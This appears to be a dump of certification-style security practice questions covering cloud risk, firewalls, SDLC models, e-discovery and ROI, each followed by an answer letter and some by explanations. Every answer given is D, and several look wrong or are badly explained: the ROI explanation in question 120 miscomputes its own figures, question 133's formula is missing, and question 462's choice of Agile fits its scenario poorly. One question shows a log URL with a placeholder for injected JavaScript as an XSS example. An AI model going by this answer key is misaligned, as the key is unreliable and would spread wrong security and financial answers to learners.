QUESTION NO: 278 A company runs large computing jobs only during the overnight hours. To minimize the amount of capital investment in equipment, the company relies on the elastic computing services of a major cloud computing vendor. Because the virtual resources are created and destroyed on the fly across a large pool of shared resources, the company never knows which specific hardware platforms will be used from night to night. Which of the following presents the MOST risk to confidentiality in this scenario? A. Loss of physical control of the servers B. Distribution of the job to multiple data centers C. Network transmission of cryptographic keys D. Data scraped from the hardware platforms

Answer: D Explanation:

QUESTION NO: 283 A corporation has Research and Development (R&D) and IT support teams, each requiring separate networks with independent control of their security boundaries to support department objectives. The corporation's Information Security Officer (ISO) is responsible for providing firewall services to both departments, but does not want to increase the hardware footprint within the datacenter. Which of the following should the ISO consider to provide the independent functionality required by each department's IT teams? A. Put both departments behind the firewall and assign administrative control for each department to the corporate firewall. B. Provide each department with a virtual firewall and assign administrative control to the physical firewall. C. Put both departments behind the firewall and incorporate restrictive controls on each department's network. D. Provide each department with a virtual firewall and assign appropriate levels of management for the virtual device.

Answer: D Explanation:

QUESTION NO: 285 After connecting to a secure payment server at https://pay.xyz.com, an auditor notices that the SSL certificate was issued to *.xyz.com. The auditor also notices that many of the internal development servers use the same certificate. After installing the certificate on dev1.xyz.com, one of the developers reports misplacing the USB thumb-drive where the SSL certificate was stored. Which of the following should the auditor recommend FIRST? A. Generate a new public key on both servers. B. Replace the SSL certificate on dev1.xyz.com. C. Generate a new private key password for both servers. D. Replace the SSL certificate on pay.xyz.com.

Answer: D Explanation:

QUESTION NO: 288 A company receives an e-discovery request for the Chief Information Officer's (CIO's) email data. The storage administrator reports that the data retention policy relevant to their industry only requires one year of email data. However the storage administrator also reports that there are three years of email data on the server and five years of email data on backup tapes. How many years of data MUST the company legally provide? A. 1 B. 2 C. 3 D. 5

Answer: D Explanation:

QUESTION NO: 289 The VoIP administrator starts receiving reports that users are having problems placing phone calls. The VoIP administrator cannot determine the issue, and asks the security administrator for help. The security administrator reviews the switch interfaces and does not see an excessive amount of network traffic on the voice network. Using a protocol analyzer, the security administrator does see an excessive number of SIP INVITE packets destined for the SIP proxy. Based on the information given, which of the following types of attacks is underway and how can it be remediated? A. Man in the middle attack; install an IPS in front of SIP proxy. B. Man in the middle attack; use 802.1x to secure voice VLAN. C. Denial of Service; switch to more secure H.323 protocol. D. Denial of Service; use rate limiting to limit traffic.

Answer: D Explanation:

QUESTION NO: 291 A large corporation which is heavily reliant on IT platforms and systems is in financial difficulty and needs to drastically reduce costs in the short term to survive. The Chief Financial Officer (CFO) has mandated that all IT and architectural functions will be outsourced and a mixture of providers will be selected. One provider will manage the desktops for five years, another provider will manage the network for ten years, another provider will be responsible for security for four years, and an offshore provider will perform day to day business processing functions for two years. At the end of each contract the incumbent may be renewed or a new provider may be selected. Which of the following are the MOST likely risk implications of the CFO's business decision? A. Strategic architecture will be adversely impacted through the segregation of duties between the providers. Vendor management costs will remain unchanged. The risk position of the organization will decline as specialists now maintain the environment. The implementation of security controls and security updates will improve. Internal knowledge of IT systems will improve as providers maintain system documentation. B. Strategic architecture will improve as more time can be dedicated to strategy. System stability will improve as providers use specialists and tested processes to maintain systems. Vendor management costs will increase and the organization's flexibility to react to new market conditions will be reduced slightly. Internal knowledge of IT systems will improve as providers maintain system documentation. The risk position of the organization will remain unchanged. C. Strategic architecture will not be impacted in the short term, but will be adversely impacted in the long term through the segregation of duties between the providers. Vendor management costs will stay the same and the organization's flexibility to react to new market conditions will be improved through best of breed technology implementations. Internal knowledge of IT systems will decline over time. The implementation of security controls and security updates will not change. D. Strategic architecture will be adversely impacted through the segregation of duties between the providers. Vendor management costs will increase and the organization's flexibility to react to new market conditions will be reduced. Internal knowledge of IT systems will decline and decrease future platform development. The implementation of security controls and security updates will take longer as responsibility crosses multiple boundaries.

Answer: D Explanation:

QUESTION NO: 295 A developer is coding the crypto routine of an application that will be installed on a standard headless and diskless server connected to a NAS housed in the datacenter. The developer has written the following six lines of code to add entropy to the routine: 1 - If VIDEO input exists, use video data for entropy 2 - If AUDIO input exists, use audio data for entropy 3 - If MOUSE input exists, use mouse data for entropy 4 - IF KEYBOARD input exists, use keyboard data for entropy 5 - IF IDE input exists, use IDE data for entropy 6 - IF NETWORK input exists, use network data for entropy Which of the following lines of code will result in the STRONGEST seed when combined? A. 2 and 1 B. 3 and 5 C. 5 and 2 D. 6 and 4

Answer: D Explanation:

QUESTION NO: 302 The Linux server at Company A hosts a graphical application widely used by the company designers. One designer regularly connects to the server from a Mac laptop in the designer's office down the hall. When the security engineer learns of this it is discovered the connection is not secured and the password can easily be obtained via network sniffing. Which of the following would the security engineer MOST likely implement to secure this connection? Linux Server: 192.168.10.10/24 Mac Laptop: 192.168.10.200/24 A. From the server, establish an SSH tunnel to the Mac and VPN to 192.168.10.200. B. From the Mac, establish a remote desktop connection to 192.168.10.10 using Network Layer Authentication and the CredSSP security provider. C. From the Mac, establish a VPN to the Linux server and connect the VNC to 127.0.0.1. D. From the Mac, establish a SSH tunnel to the Linux server and connect the VNC to 127.0.0.1.

Answer: D Explanation:

QUESTION NO: 303 A data breach has occurred at Company A and as a result, the Chief Information Officer (CIO) has resigned. The CIO's laptop, cell phone and PC were all wiped of data per company policy. A month later, prosecutors in litigation with Company A suspect the CIO knew about the data breach long before it was discovered and have issued a subpoena requesting all the CIO's email from the last 12 months. The corporate retention policy recommends keeping data for no longer than 90 days. Which of the following should occur? A. Restore the CIO's email from an email server backup and provide the last 90 days from the date of the subpoena request. B. Inform the litigators that the CIOs information has been deleted as per corporate policy. C. Restore the CIO's email from an email server backup and provide the last 90 days from the date of the CIO resignation. D. Restore the CIO's email from an email server backup and provide whatever is available up to the last 12 months from the subpoena date.

Answer: D Explanation:

QUESTION NO: 305 A data processing server uses a Linux based file system to remotely mount physical disks on a shared SAN. The server administrator reports problems related to processing of files where the file appears to be incompletely written to the disk. The network administration team has conducted a thorough review of all network infrastructure and devices and found everything running at optimal performance. Other SAN customers are unaffected. The data being processed consists of millions of small files being written to disk from a network source one file at a time. These files are then accessed by a local Java program for processing before being transferred over the network to a SE Linux host for processing. Which of the following is the MOST likely cause of the processing problem? A. The administrator has a PERL script running which disrupts the NIC by restarting the CRON process every 65 seconds. B. The Java developers accounted for network latency only for the read portion of the processing and not the write process. C. The virtual file system on the SAN is experiencing a race condition between the reads and writes of network files. D. The Linux file system in use cannot write files as fast as they can be read by the Java program resulting in the errors.

Answer: D Explanation:

QUESTION NO: 306 Company ABC was formed by combining numerous companies which all had multiple databases, web portals, and cloud data sets. Each data store had a unique set of custom developed authentication mechanisms and schemas. Which of the following approaches to combining the disparate mechanisms has the LOWEST up front development costs? A. Attestation B. PKI C. Biometrics D. Federated IDs

Answer: D Explanation:

QUESTION NO: 312 At 10:35 a.m. a malicious user was able to obtain a valid authentication token which allowed read/write access to the backend database of a financial company. At 10:45 a.m. the security administrator received multiple alerts from the company's statistical anomaly-based IDS about a company database administrator performing unusual transactions. At 10:55 a.m. the security administrator resets the database administrator's password. At 11:00 a.m. the security administrator is still receiving alerts from the IDS about unusual transactions from the same user. Which of the following is MOST likely the cause of the alerts? A. The IDS logs are compromised. B. The new password was compromised. C. An input validation error has occurred. D. A race condition has occurred.

Answer: D Explanation:

QUESTION NO: 313 Company A is purchasing Company B. Company A uses a change management system for all IT processes while Company B does not have one in place. Company B's IT staff needs to purchase a third party product to enhance production. Which of the following NEXT steps should be implemented to address the security impacts this product may cause? A. Purchase the product and test it in a lab environment before installing it on any live system. B. Allow Company A and B's IT staff to evaluate the new product prior to purchasing it. C. Purchase the product and test it on a few systems before installing it throughout the entire company. D. Use Company A's change management process during the evaluation of the new product.

Answer: D Explanation:

QUESTION NO: 323 A network administrator notices a security intrusion on the web server. Which of the following is noticed by http://test.com/modules.php?op=modload&name=XForum&file=[hostilejavascript]&fid=2 in the log file? A. Buffer overflow B. Click jacking C. SQL injection D. XSS attack

Answer: D Explanation:

QUESTION NO: 331 An organization determined that each of its remote sales representatives must use a smartphone for email access. The organization provides the same centrally manageable model to each person. Which of the following mechanisms BEST protects the confidentiality of the resident data? A. Require dual factor authentication when connecting to the organization's email server. B. Require each sales representative to establish a PIN to access the smartphone and limit email storage to two weeks. C. Require encrypted communications when connecting to the organization's email server. D. Require a PIN and automatic wiping of the smartphone if someone enters a specific number of incorrect PINs.

Answer: D Explanation:

QUESTION NO: 332 An organization did not know its internal customer and financial databases were compromised until the attacker published sensitive portions of the database on several popular attacker websites. The organization was unable to determine when, how, or who conducted the attacks but rebuilt, restored, and updated the compromised database server to continue operations. Which of the following is MOST likely the cause for the organization's inability to determine what really occurred? A. Too few layers of protection between the Internet and internal network B. Lack of a defined security auditing methodology C. Poor intrusion prevention system placement and maintenance D. Insufficient logging and mechanisms for review

Answer: D Explanation:

QUESTION NO: 334 About twice a year a switch fails in a company's network center. Under the maintenance contract, the switch would be replaced in two hours losing the business $1,000 per hour. The cost of a spare switch is $3,000 with a 12-hour delivery time and would eliminate downtime costs if purchased ahead of time. The maintenance contract is $1,500 per year. Which of the following is true in this scenario? A. It is more cost-effective to eliminate the maintenance contract and purchase a replacement upon failure. B. It is more cost-effective to purchase a spare switch prior to an outage and eliminate the maintenance contract. C. It is more cost-effective to keep the maintenance contract instead of purchasing a spare switch prior to an outage. D. It is more cost-effective to purchase a spare switch prior to an outage and keep the maintenance contract.

Answer: D Explanation:

QUESTION NO: 336 An intrusion detection system logged an attack attempt from a remote IP address. One week later, the attacker successfully compromised the network. Which of the following MOST likely occurred? A. The IDS generated too many false negatives. B. The attack occurred after hours. C. The IDS generated too many false positives. D. No one was reviewing the IDS event logs.

Answer: D Explanation:

QUESTION NO: 359 The Chief Information Security Officer (CISO) regularly receives reports of a single department repeatedly violating the corporate security policy. The head of the department in question informs the CISO that the offending behaviors are a result of necessary business activities. The CISO assigns a junior security administrator to solve the issue. Which of the following is the BEST course of action for the junior security administrator to take? A. Work with the department head to find an acceptable way to change the business needs so the department no longer violates the corporate security policy. B. Draft an RFP for the purchase of a COTS product or consulting services to solve the problem through implementation of technical controls. C. Work with the CISO and department head to create an SLA specifying the response times of the IT security department when incidents are reported. D. Draft an MOU for the department head and CISO to approve, documenting the limits of the necessary behavior, and actions to be taken by both teams.

Answer: D Explanation:

QUESTION NO: 362 The Chief Information Security Officer (CISO) at a software development company is concerned about the lack of introspection during a testing cycle of the company's flagship product. Testing was conducted by a small offshore consulting firm and the report by the consulting firm clearly indicates that limited test cases were used and many of the code paths remained untested. The CISO raised concerns about the testing results at the monthly risk committee meeting, highlighting the need to get to the bottom of the product behaving unexpectedly in only some large enterprise deployments. The Security Assurance and Development teams highlighted their availability to redo the testing if required. Which of the following will provide the MOST thorough testing? A. Have the small consulting firm redo the Black box testing. B. Use the internal teams to perform Grey box testing. C. Use the internal team to perform Black box testing. D. Use the internal teams to perform White box testing. E. Use a larger consulting firm to perform Black box testing.

Answer: D Explanation:

QUESTION NO: 366 Which of the following is an example of single sign-on? A. An administrator manages multiple platforms with the same username and hardware token. The same username and token is used across all the platforms. B. Multiple applications have been integrated with a centralized LDAP directory for authentication and authorization. A user has to authenticate each time the user accesses an application. C. A password is synchronized between multiple platforms and the user is required to authenticate with the same password across each platform. D. A web access control infrastructure performs authentication and passes attributes in a HTTP header to multiple applications.

Answer: D Explanation:

QUESTION NO: 371 Company XYZ is in negotiations to acquire Company ABC for $1.2millon. Due diligence activities have uncovered systemic security issues in the flagship product of Company ABC. It has been established that a complete product rewrite would be needed with average estimates indicating a cost of $1.6millon. Which of the following approaches should the risk manager of Company XYZ recommend? A. Transfer the risk B. Accept the risk C. Mitigate the risk D. Avoid the risk

Answer: D Explanation:

QUESTION NO: 374 An external auditor has found that IT security policies in the organization are not maintained and in some cases are nonexistent. As a result of the audit findings, the CISO has been tasked with the objective of establishing a mechanism to manage the lifecycle of IT security policies. Which of the following can be used to BEST achieve the CISO's objectives? A. CoBIT B. UCF C. ISO 27002 D. eGRC

Answer: D Explanation:

QUESTION NO: 375 In a SPML exchange, which of the following BEST describes the three primary roles? A. The Provisioning Service Target (PST) entity makes the provisioning request, the Provisioning Service Provider (PSP) responds to the PST requests, and the Provisioning Service Target (PST) performs the provisioning. B. The Provisioning Service Provider (PSP) entity makes the provisioning request, the Provisioning Service Target (PST) responds to the PSP requests, and the Provisioning Service Provider (PSP) performs the provisioning. C. The Request Authority (RA) entity makes the provisioning request, the Provisioning Service Target (PST) responds to the RA requests, and the Provisioning Service Provider (PSP) performs the provisioning. D. The Request Authority (RA) entity makes the provisioning request, the Provisioning Service Provider (PSP) responds to the RA requests, and the Provisioning Service Target (PST) performs the provisioning.

Answer: D Explanation:

QUESTION NO: 400 A business owner has raised concerns with the Chief Information Security Officer (CISO) because money has been spent on IT security infrastructure, but corporate assets are still found to be vulnerable. The business recently implemented a patch management product and SOE hardening initiative. A third party auditor reported findings against the business because some systems were missing patches. Which of the following statements BEST describes this situation? A. The business owner is at fault because they are responsible for patching the systems and have already been given patch management and SOE hardening products. B. The audit findings are invalid because remedial steps have already been applied to patch servers and the remediation takes time to complete. C. The CISO has not selected the correct controls and the audit findings should be assigned to them instead of the business owner. D. Security controls are generally never 100% effective and gaps should be explained to stakeholders and managed accordingly.

Answer: D Explanation:

QUESTION NO: 404 Warehouse users are reporting performance issues at the end of each month when trying to access cloud applications to complete their end of the month financial reports. They have no problem accessing those applications at the beginning of the month. Network information: DMZ network - 192.168.5.0/24 VPN network - 192.168.1.0/24 Datacenter - 192.168.2.0/24 User network - 192.168.3.0/24 HR network - 192.168.4.0/24 Warehouse network - 192.168.6.0/24 Finance network 192.168.7.0/24 Traffic shaper configuration: VLAN Bandwidth limit (Mbps) VPN50 User175 HR220 Finance230 Warehouse75 Guest50 External firewall allows all networks to access the Internet. Internal Firewall Rules: ActionSourceDestination Permit192.168.1.0/24192.168.2.0/24 Permit192.168.1.0/24192.168.3.0/24 Permit192.168.1.0/24192.168.5.0/24 Permit192.168.2.0/24192.168.1.0/24 Permit192.168.3.0/24192.168.1.0/24 Permit192.168.5.0/24192.168.1.0/24 Permit192.168.4.0/24192.168.7.0/24 Permit192.168.7.0/24192.168.4.0/24 Permit192.168.7.0/24any Deny192.168.4.0/24any Deny192.168.1.0/24192.168.4.0/24 Denyanyany Which of the following restrictions is the MOST likely cause? A. Bandwidth limit on the traffic shaper for the finance department B. Proxy server preventing the warehouse from accessing cloud applications C. Deny statements in the firewall for the warehouse network D. Bandwidth limit on the traffic shaper for the warehouse department

Answer: D Explanation:

QUESTION NO: 432 A security engineer at a software development company has identified several vulnerabilities in a product late in the development cycle. This causes a huge delay for the release of the product. Which of the following should the administrator do to prevent these issues from occurring in the future? A. Recommend switching to an SDLC methodology and perform security testing during each maintenance iteration B. Recommend switching to a spiral software development model and perform security testing during the requirements gathering C. Recommend switching to a waterfall development methodology and perform security testing during the testing phase D. Recommend switching to an agile development methodology and perform security testing during iterations

Answer: D Explanation:

QUESTION NO: 436 For companies seeking to move to cloud services, variances in regulation between jurisdictions can be addressed in which of the following ways? A. Ensuring the cloud service provides high availability spanning multiple regions. B. Using an international private cloud model as opposed to public IaaS. C. Encrypting all data moved to or processed in a cloud-based service. D. Tagging VMs to ensure they are only run in certain geographic regions.

Answer: D Explanation:

QUESTION NO: 437 A large organization that builds and configures every data center against distinct requirements loses efficiency, which results in slow response time to resolve issues. However, total uniformity presents other problems. Which of the following presents the GREATEST risk when consolidating to a single vendor or design solution? A. Competitors gain an advantage by increasing their service offerings. B. Vendor lock in may prevent negotiation of lower rates or prices. C. Design constraints violate the principle of open design. D. Lack of diversity increases the impact of specific events or attacks.

Answer: D Explanation:

QUESTION NO: 439 A security administrator needs to deploy a remote access solution for both staff and contractors. Management favors remote desktop due to ease of use. The current risk assessment suggests protecting Windows as much as possible from direct ingress traffic exposure. Which of the following solutions should be selected? A. Deploy a remote desktop server on your internal LAN, and require an active directory integrated SSL connection for access. B. Change remote desktop to a non-standard port, and implement password complexity for the entire active directory domain. C. Distribute new IPSec VPN client software to applicable parties. Virtualize remote desktop services functionality. D. Place the remote desktop server(s) on a screened subnet, and implement two-factor authentication.

Answer: D Explanation:

QUESTION NO: 443 A company has decided to move to an agile software development methodology. The company gives all of its developers security training. After a year of agile, a management review finds that the number of items on a vulnerability scan has actually increased since the methodology change. Which of the following best practices has MOST likely been overlooked in the agile implementation? A. Penetration tests should be performed after each sprint. B. A security engineer should be paired with a developer during each cycle. C. The security requirements should be introduced during the implementation phase. D. The security requirements definition phase should be added to each sprint.

Answer: D Explanation:

QUESTION NO: 447 As a cost saving measure, a company has instructed the security engineering team to allow all consumer devices to be able to access the network. They have asked for recommendations on what is needed to secure the enterprise, yet offer the most flexibility in terms of controlling applications, and stolen devices. Which of the following is BEST suited for the requirements? A. MEAP with Enterprise Appstore B. Enterprise Appstore with client-side VPN software C. MEAP with TLS D. MEAP with MDM

Answer: D Explanation:

QUESTION NO: 448 A company uses a custom Line of Business (LOB) application to facilitate all back-end manufacturing control. Upon investigation, it has been determined that the database used by the LOB application uses a proprietary data format. The risk management group has flagged this as a potential weakness in the company's operational robustness. Which of the following would be the GREATEST concern when analyzing the manufacturing control application? A. Difficulty backing up the custom database B. Difficulty migrating to new hardware C. Difficulty training new admin personnel D. Difficulty extracting data from the database

Answer: D Explanation:

QUESTION NO: 450 A security analyst is tasked to create an executive briefing, which explains the activity and motivation of a cyber adversary. Which of the following is the MOST important content for the brief for management personnel to understand? A. Threat actor types, threat actor motivation, and attack tools B. Unsophisticated agents, organized groups, and nation states C. Threat actor types, attack sophistication, and the anatomy of an attack D. Threat actor types, threat actor motivation, and the attack impact

Answer: D Explanation:

QUESTION NO: 460 A security administrator was recently hired in a start-up company to represent the interest of security and to assist the network team in improving security in the company. The sales team is continuously contacting the security administrator to answer security questions posed by potential customers/clients. Which of the following is the BEST strategy to minimize the frequency of these requests? A. Request the major stakeholder hire a security liaison to assist the sales team with security-related questions. B. Train the sales team about basic security, and make them aware of the security policies and procedures of the company. C. The job description of the security administrator is to assist the sales team; thus the process should not be changed. D. Compile a list of the questions, develop an FAQ on the website, and train the sales team about basic security concepts.

Answer: D Explanation:

QUESTION NO: 462 A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. The original collaboration solution has been in place for nine years, contains over a million lines of code, and took over two years to develop originally. The SDLC has broken the primary delivery stages into eight different deliverables, with each section requiring an in-depth risk analysis before moving on to the next phase. Which of the following software development methods is MOST applicable? A. Spiral model B. Incremental model C. Waterfall model D. Agile model

Answer: D Explanation:

QUESTION NO: 114 Due to compliance regulations, a company requires a yearly penetration test. The Chief Information Security Officer (CISO) has asked that it be done under a black box methodology. Which of the following would be the advantage of conducting this kind of penetration test? A. The risk of unplanned server outages is reduced. B. Using documentation provided to them, the pen-test organization can quickly determine areas to focus on. C. The results will show an in-depth view of the network and should help pin-point areas of internal weakness. D. The results should reflect what attackers may be able to learn about the company.

Answer: D Explanation: A black box penetration test is usually done when you do not have access to the code, much the same like an outsider/attacker. This is then the best way to run a penetration test that will also reflect what an attacker/outsider can learn about the company. A black box test simulates an outsiders attack.

QUESTION NO: 232 An IT Manager is concerned about errors made during the deployment process for a new model of tablet. Which of the following would suggest best practices and configuration parameters that technicians could follow during the deployment process? A. Automated workflow B. Procedure C. Corporate standard D. Guideline E. Policy

Answer: D Explanation: A guideline is defined as a detailed plan or explanation to guide you in setting standards or determining a course of action. A guideline is not mandatory but it would suggest the best practices and configuration parameters required in this question.

QUESTION NO: 176 An internal development team has migrated away from Waterfall development to use Agile development. Overall, this has been viewed as a successful initiative by the stakeholders as it has improved time-to-market. However, some staff within the security team have contended that Agile development is not secure. Which of the following is the MOST accurate statement? A. Agile and Waterfall approaches have the same effective level of security posture. They both need similar amounts of security effort at the same phases of development. B. Agile development is fundamentally less secure than Waterfall due to the lack of formal up-front design and inability to perform security reviews. C. Agile development is more secure than Waterfall as it is a more modern methodology which has the advantage of having been able to incorporate security best practices of recent years. D. Agile development has different phases and timings compared to Waterfall. Security activities need to be adapted and performed within relevant Agile phases.

Answer: D Explanation: Agile and Waterfall are two distinct methods of software development. The Waterfall model employs a sequential design process. Development flows sequentially from start point to end point, with several different stages. The Agile method is an incremental and iterative approach to software design with the design process being broken into individual models that designers work on. Security activities need to be adapted and performed within individual model that designers work on.

QUESTION NO: 147 A security administrator is assessing a new application. The application uses an API that is supposed to encrypt text strings that are stored in memory. How might the administrator test that the strings are indeed encrypted in memory? A. Use fuzzing techniques to examine application inputs B. Run nmap to attach to application memory C. Use a packet analyzer to inspect the strings D. Initiate a core dump of the application E. Use an HTTP interceptor to capture the text strings

Answer: D Explanation: Applications store information in memory and this information include sensitive data, passwords, and usernames and encryption keys. Conducting memory/core dumping will allow you to analyze the memory content and then you can test that the strings are indeed encrypted.

QUESTION NO: 163 A member of the software development team has requested advice from the security team to implement a new secure lab for testing malware. Which of the following is the NEXT step that the security team should take? A. Purchase new hardware to keep the malware isolated. B. Develop a policy to outline what will be required in the secure lab. C. Construct a series of VMs to host the malware environment. D. Create a proposal and present it to management for approval.

Answer: D Explanation: Before we can create a solution, we need to motivate why the solution needs to be created and plan the best implementation with in the company's business operations. We therefore need to create a proposal that explains the intended implementation and allows for the company to budget for it.

QUESTION NO: 121 A new internal network segmentation solution will be implemented into the enterprise that consists of 200 internal firewalls. As part of running a pilot exercise, it was determined that it takes three changes to deploy a new application onto the network before it is operational. Security now has a significant effect on overall availability. Which of the following would be the FIRST process to perform as a result of these findings? A. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution could be met by another solution. Reuse the firewall infrastructure on other projects. B. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are understood by the business owners around the availability issues. Decrease the current SLA expectations to match the new solution. C. Engage internal auditors to perform a review of the project to determine why and how the project did not meet the security requirements. As part of the review ask them to review the control effectiveness. D. Review to determine if control effectiveness is in line with the complexity of the solution. Determine if the requirements can be met with a simpler solution.

Answer: D Explanation: Checking whether control effectiveness complies with the complexity of the solution and then determining if there is not an alternative simpler solution would be the first procedure to follow in the light of the findings.

QUESTION NO: 130 A human resources manager at a software development company has been tasked with recruiting personnel for a new cyber defense division in the company. This division will require personnel to have high technology skills and industry certifications. Which of the following is the BEST method for this manager to gain insight into this industry to execute the task? A. Interview candidates, attend training, and hire a staffing company that specializes in technology jobs B. Interview employees and managers to discover the industry hot topics and trends C. Attend meetings with staff, internal training, and become certified in software management D. Attend conferences, webinars, and training to remain current with the industry and job requirements

Answer: D Explanation: Conferences represent an important method of exchanging information between researchers who are usually experts in their respective fields. Together with webinars and training to remain current on the subject the manager will be able to gain valuable insight into the cyber defense industry and be able to recruit personnel.

QUESTION NO: 131 The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats? A. Cloud-based antivirus solution, running as local admin, with push technology for definition updates. B. Implementation of an offsite data center hosting all company data, as well as deployment of VDI for all client computing needs. C. Host based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall ACLs. D. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed.

Answer: D Explanation: Good preventive security practices are a must. These include installing and keeping firewall policies carefully matched to business and application needs, keeping antivirus software updated, blocking potentially harmful file attachments and keeping all systems patched against known vulnerabilities. Vulnerability scans are a good means of measuring the effectiveness of preventive procedures. Real-time protection: Deploy inline intrusion-prevention systems (IPS) that offer comprehensive protection. When considering an IPS, seek the following capabilities: network-level protection, application integrity checking, application protocol Request for Comment (RFC) validation, content validation and forensics capability. In this case it would be behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed.

QUESTION NO: 211 A university requires a significant increase in web and database server resources for one week, twice a year, to handle student registration. The web servers remain idle for the rest of the year. Which of the following is the MOST cost effective way for the university to securely handle student registration? A. Virtualize the web servers locally to add capacity during registration. B. Move the database servers to an elastic private cloud while keeping the web servers local. C. Move the database servers and web servers to an elastic private cloud. D. Move the web servers to an elastic public cloud while keeping the database servers local.

Answer: D Explanation: In cloud computing, elasticity is defined as the degree to which a system (or a particular cloud layer) autonomously adapts its capacity to workload over time. The dynamic adaptation of capacity, e.g., by altering the use of computing resources, to meet a varying workload is called "elastic computing". In general, an elastic cloud application or process has three elasticity dimensions, Cost, Quality, and Resources, enabling it to increase and decrease its cost, quality, or available resources, as to accommodate specific requirements. In this question, the web servers remain idle when they are not used for the rest of the year. Therefore, we should host the web servers in the elastic public cloud. This will be cost effective because we will not be charged for them while they are not in use. The database servers are not idle so they should be kept local.

QUESTION NO: 137 A security analyst, Ann, states that she believes Internet facing file transfer servers are being attacked. Which of the following is evidence that would aid Ann in making a case to management that action needs to be taken to safeguard these servers? A. Provide a report of all the IP addresses that are connecting to the systems and their locations B. Establish alerts at a certain threshold to notify the analyst of high activity C. Provide a report showing the file transfer logs of the servers D. Compare the current activity to the baseline of normal activity

Answer: D Explanation: In risk assessment a baseline forms the foundation for how an organization needs to increase or enhance its current level of security. This type of assessment will provide Ann with the necessary information to take to management.

QUESTION NO: 129 The security engineer receives an incident ticket from the helpdesk stating that DNS lookup requests are no longer working from the office. The network team has ensured that Layer 2 and Layer 3 connectivity are working. Which of the following tools would a security engineer use to make sure the DNS server is listening on port 53? A. PING B. NESSUS C. NSLOOKUP D. NMAP

Answer: D Explanation: NMAP works as a port scanner and is used to check if the DNS server is listening on port 53.

QUESTION NO: 168 An attacker attempts to create a DoS event against the VoIP system of a company. The attacker uses a tool to flood the network with a large number of SIP INVITE traffic. Which of the following would be LEAST likely to thwart such an attack? A. Install IDS/IPS systems on the network B. Force all SIP communication to be encrypted C. Create separate VLANs for voice and data traffic D. Implement QoS parameters on the switches

Answer: D Explanation: Quality of service (QoS) is a mechanism that is designed to give priority to different applications, users, or data to provide a specific level of performance. It is often used in networks to prioritize certain types of network traffic. It is not designed to block traffic, per se, but to give certain types of traffic a lower or higher priority than others. This is least likely to counter a denial of service (DoS) attack.

QUESTION NO: 133 An administrator wishes to replace a legacy clinical software product as it has become a security risk. The legacy product generates $10,000 in revenue a month. The new software product has an initial cost of $180,000 and a yearly maintenance of $2,000 after the first year. However, it will generate $15,000 in revenue per month and be more secure. How many years until there is a return on investment for this new package? A. 1 B. 2 C. 3 D. 4

Answer: D Explanation: Return on investment = Net profit / Investment where: Thus you will only get a return on the investment in 4 years' time. References: http://www.financeformulas.net/Return_on_Investment.html

QUESTION NO: 120 A security administrator wants to calculate the ROI of a security design which includes the purchase of new equipment. The equipment costs $50,000 and it will take 50 hours to install and configure the equipment. The administrator plans to hire a contractor at a rate of $100/hour to do the installation. Given that the new design and equipment will allow the company to increase revenue and make an additional $100,000 on the first year, which of the following is the ROI expressed as a percentage for the first year? A. -45 percent B. 5.5 percent C. 45 percent D. 82 percent

Answer: D Explanation: Return on investment = Net profit / Investment where:Net profit = gross profit - expenses investment = stock + market outstanding[when defined as?] + claims or Return on investment = (gain from investment - cost of investment) / cost of investment Thus (100 000 - 55 000)/50 000 = 0,82 = 82 % References: Gregg, Michael, and Billy Haines, CASP CompTIA Advanced Security Practitioner Study Guide, John Wiley & Sons, Indianapolis, 2012, p. 337 http://www.financeformulas.net/Return_on_Investment.html

QUESTION NO: 122 A Chief Financial Officer (CFO) has raised concerns with the Chief Information Security Officer (CISO) because money has been spent on IT security infrastructure, but corporate assets are still found to be vulnerable. The business recently funded a patch management product and SOE hardening initiative. A third party auditor reported findings against the business because some systems were missing patches. Which of the following statements BEST describes this situation? A. The CFO is at fault because they are responsible for patching the systems and have already been given patch management and SOE hardening products. B. The audit findings are invalid because remedial steps have already been applied to patch servers and the remediation takes time to complete. C. The CISO has not selected the correct controls and the audit findings should be assigned to them instead of the CFO. D. Security controls are generally never 100% effective and gaps should be explained to stakeholders and managed accordingly.

Answer: D Explanation: Security controls can never be run 100% effective and is mainly observed as a risk mitigation strategy thus the gaps should be explained to all stakeholders and managed accordingly.

QUESTION NO: 171 A security manager has received the following email from the Chief Financial Officer (CFO): "While I am concerned about the security of the proprietary financial data in our ERP application, we have had a lot of turnover in the accounting group and I am having a difficult time meeting our monthly performance targets. As things currently stand, we do not allow employees to work from home but this is something I am willing to allow so we can get back on track. What should we do first to securely enable this capability for my group?" Based on the information provided, which of the following would be the MOST appropriate response to the CFO? A. Remote access to the ERP tool introduces additional security vulnerabilities and should not be allowed. B. Allow VNC access to corporate desktops from personal computers for the users working from home. C. Allow terminal services access from personal computers after the CFO provides a list of the users working from home. D. Work with the executive management team to revise policies before allowing any remote access.

Answer: D Explanation: The Chief Financial Officer (CFO) wants to change company policy to allow employees to work from home. Before the new policy is implemented, the relevant documented company policies should be updated to reflect the new policy. Company policies are rarely defined by a single person in a company; they are usually defined by executive management. Therefore, you should work with the executive management team to revise the policies.

